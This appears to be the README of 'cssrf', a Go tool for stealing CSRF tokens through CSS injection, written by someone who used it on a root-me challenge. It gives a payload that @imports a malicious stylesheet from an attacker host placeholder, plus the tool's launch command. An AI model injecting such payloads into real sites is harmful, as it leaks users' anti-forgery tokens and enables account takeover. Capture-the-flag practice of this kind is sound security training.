Extract juicy information using CSS injection
especially csrf token 🥜
Basically the same thing as https://github.com/d0nutptr/sic but in Golang
I try my best to change the rust code but I lost so many time
All you need is launch cssrf:
cssrf [flags] # nothing crazy => cssrf -h to get flags infoInject the malicious css:
<!-- in <style> tag -->
@import url("https://[ATTACKER_URL]/malicious.css");And wait:
This help me solving a root-me challenge
Posting solution is forbidden, thus the csrf token is not integer